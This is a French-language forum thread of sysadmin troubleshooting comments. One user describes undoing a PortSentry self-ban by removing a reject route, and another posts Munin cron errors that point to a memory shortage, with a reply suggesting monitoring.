En espérant que ça serve à d'autres.

Aurioda · 24 nov. 2018

Bonjour,

Je pose ça ici car ça m'a fait perdre bcp de temps.

Je me suis fait ban par portcentry, via la directive:
KILL_ROUTE="/sbin/route add -host $TARGET$ reject"

donc j'ai lancé la commande:
route del <mon_ip_bannie> reject

Au cas où si cela sert à quelqu'un

drsky · 7 févr. 2019

bonjour,

depuis que j'ai fais le tuto j'ai un problème qui m'arrive tous les deux jours ça fait trois fois que ça m'arrive. déjà je reçoit plusieurs mail d'erreur de cron avec comme sujet : Cron <munin@kim> if [ -x /usr/bin/munin-cron ]; then /usr/bin/munin-cron; fi

voilà le log que je reçoit :
Can't load '/usr/lib/x86_64-linux-gnu/perl/5.24/auto/Fcntl/Fcntl.so' for module Fcntl: /usr/lib/x86_64-linux-gnu/perl/5.24/auto/Fcntl/Fcntl.so: échec d'adressage (mapping) du segment de l'objet partagé at /usr/share/perl/5.24/XSLoader.pm line 96. � at /usr/lib/x86_64-linux-gnu/perl/5.24/Fcntl.pm line 11. Compilation failed in require at /usr/share/perl5/Munin/Master/Utils.pm line 12. BEGIN failed--compilation aborted at /usr/share/perl5/Munin/Master/Utils.pm line 12. Compilation failed in require at /usr/share/perl5/Munin/Master/UpdateWorker.pm line 18. BEGIN failed--compilation aborted at /usr/share/perl5/Munin/Master/UpdateWorker.pm line 18. Compilation failed in require at /usr/share/perl5/Munin/Master/Update.pm line 17. BEGIN failed--compilation aborted at /usr/share/perl5/Munin/Master/Update.pm line 17. Compilation failed in require at /usr/share/munin/munin-update line 14. BEGIN failed--compilation aborted at /usr/share/munin/munin-update line 14.

ou encore :
Forking worker failed: Cannot allocate memory at /usr/share/perl5/Munin/Master/Update.pm line 162.

et pour finir le dernier type :
Can't load '/usr/lib/x86_64-linux-gnu/perl5/5.24/auto/Socket6/Socket6.so' for module Socket6: /usr/lib/x86_64-linux-gnu/perl5/5.24/auto/Socket6/Socket6.so: échec d'adressage (mapping) du segment de l'objet partagé at /usr/lib/x86_64-linux-gnu/perl/5.24/DynaLoader.pm line 187. � at /usr/share/perl5/IO/Socket/INET6.pm line 40. Compilation failed in require at /usr/share/perl5/IO/Socket/INET6.pm line 40. BEGIN failed--compilation aborted at /usr/share/perl5/IO/Socket/INET6.pm line 40. Compilation failed in require at /usr/share/perl5/Munin/Master/Node.pm line 18. BEGIN failed--compilation aborted at /usr/share/perl5/Munin/Master/Node.pm line 18. Compilation failed in require at /usr/share/perl5/Munin/Master/UpdateWorker.pm line 17. BEGIN failed--compilation aborted at /usr/share/perl5/Munin/Master/UpdateWorker.pm line 17. Compilation failed in require at /usr/share/perl5/Munin/Master/Update.pm line 17. BEGIN failed--compilation aborted at /usr/share/perl5/Munin/Master/Update.pm line 17. Compilation failed in require at /usr/share/munin/munin-update line 14. BEGIN failed--compilation aborted at /usr/share/munin/munin-update line 14.

quand ça m'arrive je ne peux plus accéder à mon serveur je suis obliger de le redémarrer par le manager pour pouvoir y accéder. Si vous avez une piste merci d'avance

Backtoback · 11 févr. 2019

Bonjour,

On dirait que tu as un probleme de memoire.
Si tu as un outil de monitoring, ca pourrait etre interessant d'y jeter un oeil pendant la tache cron